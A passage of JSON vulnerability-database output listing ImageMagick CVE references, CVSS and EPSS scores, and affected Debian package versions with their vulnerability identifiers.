"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1732284", "reference_id": "1732284", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1732284" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=931192", "reference_id": "931192", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=931192" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2020:1180", "reference_id": "RHSA-2020:1180", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2020:1180" }, { "reference_url": "https://usn.ubuntu.com/4192-1/", "reference_id": "USN-4192-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4192-1/" }, { "reference_url": "https://usn.ubuntu.com/6985-1/", "reference_id": "USN-6985-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/6985-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1037804?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.10.23%2Bdfsg-2.1%2Bdeb10u1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-12rd-dhh3-h3ea" }, { "vulnerability": "VCID-152y-9pjj-p7b7" }, { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-18rv-b2mg-jbex" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2dgn-j4dn-9fcd" }, { "vulnerability": "VCID-2dwv-ndt5-gfg2" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2m38-vt4m-5ffa" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-3bbh-2exn-m7ac" }, { "vulnerability": "VCID-3qad-mewf-8khz" }, { "vulnerability": "VCID-3zbe-p6ue-ffe8" }, { "vulnerability": "VCID-41xr-8ryd-z3ew" }, { "vulnerability": "VCID-453d-2nac-jbdc" }, { "vulnerability": "VCID-46ey-s7sy-9qby" }, { "vulnerability": "VCID-4az8-8361-7bg2" }, { "vulnerability": "VCID-4f97-2smu-6qfc" }, { "vulnerability": "VCID-4s25-p8ea-zkh7" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-56xz-svu7-eue2" }, { "vulnerability": "VCID-5a4x-wwha-pufn" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-6279-tc7g-g3ag" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-68kj-s42g-effd" }, { "vulnerability": "VCID-6bf2-uh5z-kfg7" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6vvv-g1fm-4bdn" }, { "vulnerability": "VCID-6y99-sgwe-tygw" }, { "vulnerability": "VCID-6zuv-uh18-k3c1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gya-qyjx-qqfx" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-7yur-twpa-n3e1" }, { "vulnerability": "VCID-834e-c7gn-afac" }, { "vulnerability": "VCID-8yfc-gunh-17a2" }, { "vulnerability": "VCID-92es-dtbz-tqae" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-9h1k-h8gw-hkat" }, { "vulnerability": "VCID-acgu-hc83-yubn" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-aej5-sgf8-7uhp" }, { "vulnerability": "VCID-agz5-g8mr-e7hn" }, { "vulnerability": "VCID-anh4-1hmn-yfh8" }, { "vulnerability": "VCID-aqs4-r36j-ffe7" }, { "vulnerability": "VCID-ay8n-59tt-k7cp" }, { "vulnerability": "VCID-b32k-mwuv-hfeq" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-b8hx-6u4j-b3dc" }, { "vulnerability": "VCID-bcy4-phg3-w3fq" }, { "vulnerability": "VCID-bky2-hjpj-67ag" }, { "vulnerability": "VCID-c8rr-y6zy-h7h5" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-ccbh-689z-6kg2" }, { "vulnerability": "VCID-cmym-m1da-f3fg" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-cure-qgzj-8qfu" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-djqz-f6k5-fqfj" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-ezcj-2yaf-rfhh" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-fzhr-jhhc-m3ej" }, { "vulnerability": "VCID-g1ct-6d28-g3ab" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gc9p-4vdm-rbah" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-gf8v-mmd7-hqag" }, { "vulnerability": "VCID-gp36-v664-vuh2" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-h7em-v8x6-63e3" }, { "vulnerability": "VCID-hrrw-ufje-akg5" }, { "vulnerability": "VCID-hwcd-dj3f-guay" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jpxf-qevp-kycp" }, { "vulnerability": "VCID-jqv2-v42r-7ybf" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-kfb4-xnqr-cya6" }, { "vulnerability": "VCID-mhbe-8x14-f3d6" }, { "vulnerability": "VCID-mmw7-4m3z-2kcn" }, { "vulnerability": "VCID-mn5y-2hmf-dkgy" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-my2x-tnvf-wqbw" }, { "vulnerability": "VCID-n22y-f9az-fubm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-neaa-39c7-sfbc" }, { "vulnerability": "VCID-nvea-drm5-h3au" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-nxfx-jh82-vud3" }, { "vulnerability": "VCID-p3vh-b6jn-f3e2" }, { "vulnerability": "VCID-p4yb-mqca-v7c8" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-p6m5-ntbm-auct" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-pj8s-qad1-6qdu" }, { "vulnerability": "VCID-pjm4-2g47-4qau" }, { "vulnerability": "VCID-pk4j-w1q9-vqd2" }, { "vulnerability": "VCID-pmpn-drv8-9ude" }, { "vulnerability": "VCID-psf6-cvdn-h3b1" }, { "vulnerability": "VCID-ptej-pfyn-z3aq" }, { "vulnerability": "VCID-q3v4-jztv-9bbs" }, { "vulnerability": "VCID-qda9-n7gh-c7c4" }, { "vulnerability": "VCID-qrqm-h5se-1kep" }, { "vulnerability": "VCID-r1uc-e1w7-kyda" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-rqdx-1pdv-a3bu" }, { "vulnerability": "VCID-rqm7-d751-myfa" }, { "vulnerability": "VCID-rrvd-vd81-sfdm" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-rvjq-uks4-x3h3" }, { "vulnerability": "VCID-rzge-64xp-bfej" }, { "vulnerability": "VCID-s7tx-uu27-xqb5" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-snup-2hn7-sue2" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-swqu-wape-83bj" }, { "vulnerability": "VCID-sy2v-5ufy-sfc4" }, { "vulnerability": "VCID-t2pe-etah-1bh3" }, { "vulnerability": "VCID-tc3z-912z-afc8" }, { "vulnerability": "VCID-tm56-q7ka-ukft" }, { "vulnerability": "VCID-tn11-bwg6-m3e3" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-twq8-ntkg-zbfk" }, { "vulnerability": "VCID-u6vb-tewy-fkda" }, { "vulnerability": "VCID-u9gb-ppd4-3fd5" }, { "vulnerability": "VCID-ucfp-qqy4-jqdm" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-uwq6-h2du-dkdn" }, { "vulnerability": "VCID-v2r8-1wgn-1bgs" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vf3u-cgrx-a7d7" }, { "vulnerability": "VCID-vgvf-at1z-8ydr" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-vrqg-4fke-mfay" }, { "vulnerability": "VCID-wpsv-h9q7-pyep" }, { "vulnerability": "VCID-wwcs-2mw8-4bbr" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-x95w-ad3j-n7aj" }, { "vulnerability": "VCID-x998-fhs5-93ht" }, { "vulnerability": "VCID-xnkt-e7mn-e7du" }, { "vulnerability": "VCID-xsue-s6sg-aqff" }, { "vulnerability": "VCID-xtfv-8vvu-qudb" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yhmq-s1jh-17bh" }, { "vulnerability": "VCID-yspe-wj34-juck" }, { "vulnerability": "VCID-ytpg-f9mm-sbev" }, { "vulnerability": "VCID-yub2-x8z7-d3e6" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zdu5-rtg2-pffb" }, { "vulnerability": "VCID-zh44-pz7k-abba" }, { "vulnerability": "VCID-zp6q-98qj-ykh1" }, { "vulnerability": "VCID-zv8w-puzj-23cd" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.10.23%252Bdfsg-2.1%252Bdeb10u1" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2019-12976" ], "risk_score": 2.4, "exploitability": "0.5", "weighted_severity": "4.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-qda9-n7gh-c7c4" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82348?format=api", "vulnerability_id": "VCID-qrqm-h5se-1kep", "summary": "ImageMagick: memory leaks in AcquireMagickMemory", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-13301.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-13301.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-13301", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00202", "scoring_system": "epss", "scoring_elements": "0.42228", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00202", "scoring_system": "epss", "scoring_elements": "0.42296", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00206", "scoring_system": "epss", "scoring_elements": "0.43015", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00206", "scoring_system": "epss", "scoring_elements": "0.42952", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00206", "scoring_system": "epss", "scoring_elements": "0.43002", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00206", "scoring_system": "epss", "scoring_elements": "0.43014", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00206", "scoring_system": "epss", "scoring_elements": "0.43037", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00206", "scoring_system": "epss", "scoring_elements": "0.43003", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00206", "scoring_system": "epss", "scoring_elements": "0.42986", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00206", "scoring_system": "epss", "scoring_elements": "0.43046", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00206", "scoring_system": "epss", "scoring_elements": "0.43034", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00206", "scoring_system": "epss", "scoring_elements": "0.42924", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00206", "scoring_system": "epss", "scoring_elements": "0.42988", "published_at": "2026-04-02T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-13301" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" }, { "reference_url": 